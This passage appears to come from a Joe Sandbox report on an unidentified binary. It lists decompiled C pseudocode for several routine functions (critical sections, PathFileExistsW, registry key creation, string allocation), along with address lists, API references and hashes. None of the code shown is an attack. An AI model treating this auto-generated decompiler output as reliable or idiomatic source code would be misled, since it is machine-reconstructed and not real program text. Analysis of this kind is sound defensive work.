                                                                                                                                                                                          0x00cde2a5
                                                                                                                                                                                          0x00cde2b0
                                                                                                                                                                                          0x00cde2b4
                                                                                                                                                                                          0x00cde2bf
                                                                                                                                                                                          0x00cde2c3
                                                                                                                                                                                          0x00cde2ce
                                                                                                                                                                                          0x00cde2d2
                                                                                                                                                                                          0x00cde2dd
                                                                                                                                                                                          0x00cde2e1
                                                                                                                                                                                          0x00cde2ec
                                                                                                                                                                                          0x00cde2f0
                                                                                                                                                                                          0x00cde2fb
                                                                                                                                                                                          0x00cde2ff
                                                                                                                                                                                          0x00cde30a
                                                                                                                                                                                          0x00cde30e
                                                                                                                                                                                          0x00cde319
                                                                                                                                                                                          0x00cde31d
                                                                                                                                                                                          0x00cde328
                                                                                                                                                                                          0x00cde32c
                                                                                                                                                                                          0x00cde331
                                                                                                                                                                                          0x00cde336
                                                                                                                                                                                          0x00cde33c
                                                                                                                                                                                          0x00cde33e
                                                                                                                                                                                          0x00cde343
                                                                                                                                                                                          0x00cde34f
                                                                                                                                                                                          0x00cde353
                                                                                                                                                                                          0x00cde358
                                                                                                                                                                                          0x00cde35e
                                                                                                                                                                                          0x00cde360
                                                                                                                                                                                          0x00cde363
                                                                                                                                                                                          0x00cde366
                                                                                                                                                                                          0x00cde369
                                                                                                                                                                                          0x00cde36e
                                                                                                                                                                                          0x00cde37a
                                                                                                                                                                                          0x00cde37e
                                                                                                                                                                                          0x00cde389
                                                                                                                                                                                          0x00cde38d
                                                                                                                                                                                          0x00cde398
                                                                                                                                                                                          0x00cde39c
                                                                                                                                                                                          0x00cde3a7
                                                                                                                                                                                          0x00cde3ab
                                                                                                                                                                                          0x00cde3b6
                                                                                                                                                                                          0x00cde3ba
                                                                                                                                                                                          0x00cde3c5
                                                                                                                                                                                          0x00cde3c9
                                                                                                                                                                                          0x00cde3d4
                                                                                                                                                                                          0x00cde3d8
                                                                                                                                                                                          0x00cde3dd
                                                                                                                                                                                          0x00cde3e2
                                                                                                                                                                                          0x00cde3e8
                                                                                                                                                                                          0x00cde3f4
                                                                                                                                                                                          0x00cde3f8
                                                                                                                                                                                          0x00cde403
                                                                                                                                                                                          0x00cde407
                                                                                                                                                                                          0x00cde412
                                                                                                                                                                                          0x00cde416
                                                                                                                                                                                          0x00cde424
                                                                                                                                                                                          0x00cde428
                                                                                                                                                                                          0x00cde42e
                                                                                                                                                                                          0x00cde434
                                                                                                                                                                                          0x00cde43a
                                                                                                                                                                                          0x00cde440
                                                                                                                                                                                          0x00cde446
                                                                                                                                                                                          0x00cde44c
                                                                                                                                                                                          0x00cde456
                                                                                                                                                                                          0x00cde45a
                                                                                                                                                                                          0x00cde462
                                                                                                                                                                                          0x00cde466
                                                                                                                                                                                          0x00cde474
                                                                                                                                                                                          0x00cde482
                                                                                                                                                                                          0x00cde486
                                                                                                                                                                                          0x00cde48e
                                                                                                                                                                                          0x00cde493
                                                                                                                                                                                          0x00cde499
                                                                                                                                                                                          0x00cde49f
                                                                                                                                                                                          0x00cde4a5
                                                                                                                                                                                          0x00cde4ab
                                                                                                                                                                                          0x00cde4b8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00CDE23B
                                                                                                                                                                                            • Part of subcall function 00CDD7E5: __EH_prolog3.LIBCMT ref: 00CDD7EC
                                                                                                                                                                                            • Part of subcall function 00CD19D3: __EH_prolog3.LIBCMT ref: 00CD19DA
                                                                                                                                                                                            • Part of subcall function 00CE91F1: __EH_prolog3.LIBCMT ref: 00CE91F8
                                                                                                                                                                                            • Part of subcall function 00CCCA19: __EH_prolog3.LIBCMT ref: 00CCCA20
                                                                                                                                                                                            • Part of subcall function 00C9820F: InterlockedDecrement.KERNEL32 ref: 00C98223
                                                                                                                                                                                            • Part of subcall function 00C9CCC5: InterlockedIncrement.KERNEL32(-000000F4), ref: 00C9CD08
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: H_prolog3$Interlocked$DecrementIncrement
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 968157455-0
                                                                                                                                                                                          • Opcode ID: 3173992105c3e6763f93b7813b99f9ede84c5b11107a8a84fcf5f851c1f917ac
                                                                                                                                                                                          • Instruction ID: 32ddf2f4001b0084e0b96ded6a0df3f9748498264f5b7f101195be3225c63429
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3173992105c3e6763f93b7813b99f9ede84c5b11107a8a84fcf5f851c1f917ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: AE711C74805B88DED725EBB9C5557DEFBE0AF25300F44448ED59A53382DBB42708EB22
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C9AFA1 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 81%
                                                                                                                                                                                          			E00C9AFA1(void* __ebx, intOrPtr __edx, intOrPtr __edi, void* __esi, void* __eflags, void* __fp0) {
				void* __ebp;
				signed int _t21;
				intOrPtr _t40;
				intOrPtr _t55;
				intOrPtr _t58;
				intOrPtr _t59;
				signed int _t60;
				void* _t62;
				void* _t65;

				_t65 = __eflags;
				_t54 = __edi;
				_t53 = __edx;
				_t60 = _t62 - 0x700;
				_t21 =  *0xd64070; // 0x8a9e1774
				 *(_t60 + 0x704) = _t21 ^ _t60;
				_push(0x38);
				E00D0155A(0xd2fffe, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t60 - 0x44)) = 0xd3a96c;
				 *((intOrPtr*)(_t60 - 0x40)) = 0;
				 *((intOrPtr*)(_t60 - 0x3c)) = 0;
				 *((intOrPtr*)(_t60 - 0x38)) = 0;
				 *((intOrPtr*)(_t60 - 0x34)) = 0;
				 *((intOrPtr*)(_t60 - 0x30)) = 0;
				 *((intOrPtr*)(_t60 - 0x2c)) = 0;
				 *((intOrPtr*)(_t60 - 4)) = 0;
				E00C9A935(0xd6652c, _t60 - 0x44);
				E00CB8CC0(0, _t60, __edx, __edi, 0xd6652c, _t65, __fp0); // executed
				 *((char*)(_t60 - 4)) = 1;
				if(E00C9AAD3(_t60, 0, 0) != 0) {
					E00CB6B6A(_t60 + 0x7a,  *((intOrPtr*)(_t60 + 0x714)));
					_t54 = E00C980A8();
					E00C9AC71(0, 0xd6652c, _t54, 0xd6652c, __eflags);
					_t58 = _t54;
				} else {
					_t58 = 0;
				}
				 *((char*)(_t60 - 4)) = 0;
				E00CB883F(0, _t60, _t53, _t54, _t58, 0);
				E00C975A9(_t60 - 0x34);
				E00C9758C(_t60 - 0x40);
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0xc));
				_pop(_t55);
				_pop(_t59);
				_pop(_t40);
				return E00D0071A(_t58, _t40,  *(_t60 + 0x704) ^ _t60, _t53, _t55, _t59);
			}












                                                                                                                                                                                          0x00c9afa1
                                                                                                                                                                                          0x00c9afa1
                                                                                                                                                                                          0x00c9afa1
                                                                                                                                                                                          0x00c9afa8
                                                                                                                                                                                          0x00c9afac
                                                                                                                                                                                          0x00c9afb3
                                                                                                                                                                                          0x00c9afb9
                                                                                                                                                                                          0x00c9afc0
                                                                                                                                                                                          0x00c9afc7
                                                                                                                                                                                          0x00c9afce
                                                                                                                                                                                          0x00c9afd1
                                                                                                                                                                                          0x00c9afd4
                                                                                                                                                                                          0x00c9afd7
                                                                                                                                                                                          0x00c9afda
                                                                                                                                                                                          0x00c9afdd
                                                                                                                                                                                          0x00c9afeb
                                                                                                                                                                                          0x00c9afee
                                                                                                                                                                                          0x00c9aff6
                                                                                                                                                                                          0x00c9b000
                                                                                                                                                                                          0x00c9b00b
                                                                                                                                                                                          0x00c9b059
                                                                                                                                                                                          0x00c9b068
                                                                                                                                                                                          0x00c9b06a
                                                                                                                                                                                          0x00c9b06f
                                                                                                                                                                                          0x00c9b00d
                                                                                                                                                                                          0x00c9b00d
                                                                                                                                                                                          0x00c9b00d
                                                                                                                                                                                          0x00c9b012
                                                                                                                                                                                          0x00c9b015
                                                                                                                                                                                          0x00c9b01d
                                                                                                                                                                                          0x00c9b025
                                                                                                                                                                                          0x00c9b02f
                                                                                                                                                                                          0x00c9b037
                                                                                                                                                                                          0x00c9b038
                                                                                                                                                                                          0x00c9b039
                                                                                                                                                                                          0x00c9b04e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • __EH_prolog3.LIBCMT ref: 00C9AFC0
                                                                                                                                                                                            • Part of subcall function 00C9A935: EnterCriticalSection.KERNEL32(00D6651C), ref: 00C9A94C
                                                                                                                                                                                            • Part of subcall function 00C9A935: GetCurrentThreadId.KERNEL32 ref: 00C9A952
                                                                                                                                                                                            • Part of subcall function 00C9A935: LeaveCriticalSection.KERNEL32(00D6651C), ref: 00C9A96E
                                                                                                                                                                                            • Part of subcall function 00CB8CC0: __EH_prolog3.LIBCMT ref: 00CB8CC7
                                                                                                                                                                                            • Part of subcall function 00CB8CC0: _memset.LIBCMT ref: 00CB8E35
                                                                                                                                                                                            • Part of subcall function 00C9AAD3: SetLastError.KERNEL32(0000000E), ref: 00C9AAE8
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalH_prolog3Section$CurrentEnterErrorLastLeaveThread_memset
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4219273233-0
                                                                                                                                                                                          • Opcode ID: 189facd9462facb98b7acb5a863acc20c61981c95357ff5dbc3b86a18ad3818b
                                                                                                                                                                                          • Instruction ID: 1cb3827dde184caf013242b0c73d3a5fd5f9993feee3d9e4695ad274cef49158
                                                                                                                                                                                          • Opcode Fuzzy Hash: 189facd9462facb98b7acb5a863acc20c61981c95357ff5dbc3b86a18ad3818b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8C213E71D05258ABCF14EFA9D9856DDBBB4FF18300F50416EE809A7281EB34AA08DF61
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C8E370 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 82%
                                                                                                                                                                                          			E00C8E370(void* __eflags, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				char _v16;
				intOrPtr _v20;
				signed int _t13;
				void* _t18;
				signed int _t19;
				int _t22;
				void* _t31;
				WCHAR* _t36;
				signed int _t39;
				intOrPtr _t40;

				_push(0xffffffff);
				_push(0xd391c0);
				_push( *[fs:0x0]);
				_t13 =  *0xd64070; // 0x8a9e1774
				_push(_t13 ^ _t39);
				 *[fs:0x0] =  &_v16;
				_v20 = _t40;
				if(E00C8DFE0() == 0) {
					_t36 = _a4;
					if(_a8 == 0) {
						L4:
						if(_a12 == 0) {
							L6:
							_v8 = 0;
							_t18 = E00C8E320(_t36, _a16);
							 *[fs:0x0] = _v16;
							return _t18;
						} else {
							_t19 = E00C8E060(_t31, _t36);
							_t40 = _t40 + 4;
							if((_t19 & 0xffffff00 | _t19 == 0x00000000) != 0) {
								goto L1;
							} else {
								goto L6;
							}
						}
					} else {
						_t22 = PathFileExistsW(_t36); // executed
						if(_t22 == 0) {
							goto L1;
						} else {
							goto L4;
						}
					}
				} else {
					L1:
					 *[fs:0x0] = _v16;
					return 1;
				}
			}














                                                                                                                                                                                          0x00c8e373
                                                                                                                                                                                          0x00c8e375
                                                                                                                                                                                          0x00c8e380
                                                                                                                                                                                          0x00c8e385
                                                                                                                                                                                          0x00c8e38c
                                                                                                                                                                                          0x00c8e390
                                                                                                                                                                                          0x00c8e396
                                                                                                                                                                                          0x00c8e3a0
                                                                                                                                                                                          0x00c8e3bf
                                                                                                                                                                                          0x00c8e3c2
                                                                                                                                                                                          0x00c8e3cf
                                                                                                                                                                                          0x00c8e3d3
                                                                                                                                                                                          0x00c8e3e7
                                                                                                                                                                                          0x00c8e3ec
                                                                                                                                                                                          0x00c8e3f3
                                                                                                                                                                                          0x00c8e3fe
                                                                                                                                                                                          0x00c8e40c
                                                                                                                                                                                          0x00c8e3d5
                                                                                                                                                                                          0x00c8e3d6
                                                                                                                                                                                          0x00c8e3db
                                                                                                                                                                                          0x00c8e3e5
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8e3e5
                                                                                                                                                                                          0x00c8e3c4
                                                                                                                                                                                          0x00c8e3c5
                                                                                                                                                                                          0x00c8e3cd
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c8e3cd
                                                                                                                                                                                          0x00c8e3a2
                                                                                                                                                                                          0x00c8e3a2
                                                                                                                                                                                          0x00c8e3aa
                                                                                                                                                                                          0x00c8e3b8
                                                                                                                                                                                          0x00c8e3b8

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00C8DFE0: GetCurrentProcessId.KERNEL32 ref: 00C8DFE4
                                                                                                                                                                                            • Part of subcall function 00C8DFE0: CreateFileW.KERNEL32 ref: 00C8E00A
                                                                                                                                                                                          • PathFileExistsW.SHLWAPI(?,8A9E1774,?,00000000,?,?,00000000,00D391C0,000000FF,?,00C8B43F,?), ref: 00C8E3C5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CreateCurrentExistsPathProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3040742104-0
                                                                                                                                                                                          • Opcode ID: 21141ed5933a7b4e1554ac28a039b7ccb84281df4e85f7825b4b64c00f7ba5b7
                                                                                                                                                                                          • Instruction ID: 6141a4dfdbf99f554195f1ded0f6a347528ed11c32605e85c94a5ba09cbf5b4e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 21141ed5933a7b4e1554ac28a039b7ccb84281df4e85f7825b4b64c00f7ba5b7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6311C272A04608ABDB10AF55EC01BAAB7A8EB01325F00452AFC15D3290D776AE04CBB5
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00CA4F23 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00CA4F23(void* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				char _v28;
				void* _t26;
				void* _t28;
				void* _t30;
				void* _t32;
				void* _t38;

				_t38 = __ecx;
				if( *((intOrPtr*)(_t38 + 0x1108)) == GetCurrentThreadId()) {
					if( *((intOrPtr*)(_t38 + 0x10f0)) == 0) {
						L2:
						return 0;
					}
					E00C9E72B(_t38 + 0x10cc);
					 *(_t38 + 0x4c) =  *(_t38 + 0x4c) & 0x00000000;
					 *(_t38 + 0x10f8) =  *(_t38 + 0x10f8) & 0x00000000;
					_t32 = E00CA2D6D(_t38,  *_a4, 0x8020, 0x100);
					if(_t32 > 0) {
						if(_a8 != 0) {
							_push(_a8);
						} else {
							_push( &_v28);
						}
						_t26 =  *((intOrPtr*)(_t38 + 0x1118))( *((intOrPtr*)(_t38 + 0x10f0)), _t32);
						E00CA40C6(_t32);
						_t28 = _t26;
					} else {
						_t28 = 0;
					}
					return _t28;
				}
				_t30 = _t38 + 0x10cc;
				 *(_t30 + 0x1c) =  *(_t30 + 0x1c) & 0x00000000;
				 *(_t30 + 0x20) =  *(_t30 + 0x20) & 0x00000000;
				 *((intOrPtr*)(_t30 + 0x18)) = 0x3f3;
				goto L2;
			}









                                                                                                                                                                                          0x00ca4f2a
                                                                                                                                                                                          0x00ca4f38
                                                                                                                                                                                          0x00ca4f5a
                                                                                                                                                                                          0x00ca4f4f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca4f4f
                                                                                                                                                                                          0x00ca4f63
                                                                                                                                                                                          0x00ca4f68
                                                                                                                                                                                          0x00ca4f6c
                                                                                                                                                                                          0x00ca4f8a
                                                                                                                                                                                          0x00ca4f8e
                                                                                                                                                                                          0x00ca4f98
                                                                                                                                                                                          0x00ca4fa0
                                                                                                                                                                                          0x00ca4f9a
                                                                                                                                                                                          0x00ca4f9d
                                                                                                                                                                                          0x00ca4f9d
                                                                                                                                                                                          0x00ca4faa
                                                                                                                                                                                          0x00ca4fb6
                                                                                                                                                                                          0x00ca4fbc
                                                                                                                                                                                          0x00ca4f90
                                                                                                                                                                                          0x00ca4f90
                                                                                                                                                                                          0x00ca4f90
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00ca4fbe
                                                                                                                                                                                          0x00ca4f3a
                                                                                                                                                                                          0x00ca4f40
                                                                                                                                                                                          0x00ca4f44
                                                                                                                                                                                          0x00ca4f48
                                                                                                                                                                                          0x00000000

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00CA4F2C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CurrentThread
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2882836952-0
                                                                                                                                                                                          • Opcode ID: e20840076bdc15c55d0865f9ace81b14de482041ca87a62484878ff4f72269ba
                                                                                                                                                                                          • Instruction ID: 04359dc7cf01956431656ca758d8e59270e5cbb04b2005acb645204bf8f5d6ad
                                                                                                                                                                                          • Opcode Fuzzy Hash: e20840076bdc15c55d0865f9ace81b14de482041ca87a62484878ff4f72269ba
                                                                                                                                                                                          • Instruction Fuzzy Hash: E611E531510702DFD7249BA8CC45BD6B3E8BB1535AF104829F59AC6182D7F0E984CBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C989C2 Relevance: 1.5, APIs: 1, Instructions: 32registryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 88%
                                                                                                                                                                                          			E00C989C2(intOrPtr* __ecx, void* _a4, short* _a8, short* _a12, int _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES** _a28) {
				void* _v8;
				long _t16;
				struct _SECURITY_ATTRIBUTES** _t18;
				intOrPtr* _t23;

				_push(__ecx);
				_v8 = _v8 & 0x00000000;
				_t23 = __ecx;
				_t16 = RegCreateKeyExW(_a4, _a8, 0, _a12, _a16, _a20, _a24,  &_v8,  &_a24); // executed
				_t18 = _a28;
				if(_t18 != 0) {
					 *_t18 = _a24;
				}
				if(_t16 == 0) {
					_t16 = E00C92620(_t23);
					 *_t23 = _v8;
				}
				return _t16;
			}







                                                                                                                                                                                          0x00c989c5
                                                                                                                                                                                          0x00c989c7
                                                                                                                                                                                          0x00c989d6
                                                                                                                                                                                          0x00c989e9
                                                                                                                                                                                          0x00c989ef
                                                                                                                                                                                          0x00c989f4
                                                                                                                                                                                          0x00c989f9
                                                                                                                                                                                          0x00c989f9
                                                                                                                                                                                          0x00c989fd
                                                                                                                                                                                          0x00c98a01
                                                                                                                                                                                          0x00c98a09
                                                                                                                                                                                          0x00c98a09
                                                                                                                                                                                          0x00c98a0d

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • RegCreateKeyExW.KERNEL32(?,?,00000000,?,?,?,?,00000000,?), ref: 00C989E9
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000001.00000002.537362630.0000000000C81000.00000020.00000001.01000000.00000004.sdmp, Offset: 00C80000, based on PE: true
                                                                                                                                                                                          • Associated: 00000001.00000002.537326906.0000000000C80000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537675953.0000000000D3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537750623.0000000000D5D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537775522.0000000000D5E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537801127.0000000000D60000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537839655.0000000000D65000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537865172.0000000000D66000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.537894031.0000000000D6B000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000001.00000002.538818588.0000000000FA8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_c80000_UNK_.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Create
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2289755597-0
                                                                                                                                                                                          • Opcode ID: a1ca93f7647d1537a1ec558bb83c52167e09529fffc3c12adfb38eb2f11b59e6
                                                                                                                                                                                          • Instruction ID: 8a14f70fb69f8a290914a6a98dc42ee7acf1823c8b2800ff52d027da32b95ac0
                                                                                                                                                                                          • Opcode Fuzzy Hash: a1ca93f7647d1537a1ec558bb83c52167e09529fffc3c12adfb38eb2f11b59e6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 86F0F47620120AEBDF098F40C845EEE7B69EF49340F108019FD9296250DB75AA22EBA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00C98243 Relevance: 1.5, APIs: 1, Instructions: 30COMMONLIBRARYCODE
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 89%
                                                                                                                                                                                          			E00C98243(intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t17;
				intOrPtr _t19;
				void* _t21;
				intOrPtr* _t27;
				signed int _t29;
				void* _t30;

				_push(0xc);
				E00D0158D(0xd2fda4, _t21, __edi, __esi);
				_t27 = __ecx;
				 *((intOrPtr*)(_t30 - 0x14)) = __ecx;
				_t29 =  *(_t30 + 8);
				if(_t29 != 0) {
					 *(_t30 - 0x18) =  *(_t30 - 0x18) & 0x00000000;
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_push(_t29 + _t29 + 0xe); // executed
					_t17 = E00CFCE8A(_t21, __edx, __ecx, __eflags); // executed
					__eflags = _t17;
					if(_t17 != 0) {
						 *_t17 = 1;
						 *((short*)(_t17 + 0xc + _t29 * 2)) = 0;
						 *(_t17 + 4) = _t29;
						 *(_t17 + 8) = _t29;
						_t19 = _t17 + 0xc;
						__eflags = _t19;
						goto L5;
					}
				} else {
					_t19 =  *0xd5d01c; // 0xd5d014
					L5:
					 *_t27 = _t19;
					_t17 = 1;
				}
				return E00D01632(_t17);
			}









                                                                                                                                                                                          0x00c98243
                                                                                                                                                                                          0x00c9824a
                                                                                                                                                                                          0x00c9824f
                                                                                                                                                                                          0x00c98251
                                                                                                                                                                                          0x00c98254
                                                                                                                                                                                          0x00c98259
                                                                                                                                                                                          0x00c98262
                                                                                                                                                                                          0x00c98266
                                                                                                                                                                                          0x00c9826e
                                                                                                                                                                                          0x00c9826f
                                                                                                                                                                                          0x00c98286
                                                                                                                                                                                          0x00c98288
                                                                                                                                                                                          0x00c9828c
                                                                                                                                                                                          0x00c98292
                                                                                                                                                                                          0x00c98297
                                                                                                                                                                                          0x00c9829a
                                                                                                                                                                                          0x00c9829d
                                                                                                                                                                                          0x00c9829d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00c9829d
                                                                                                                                                                                          0x00c9825b
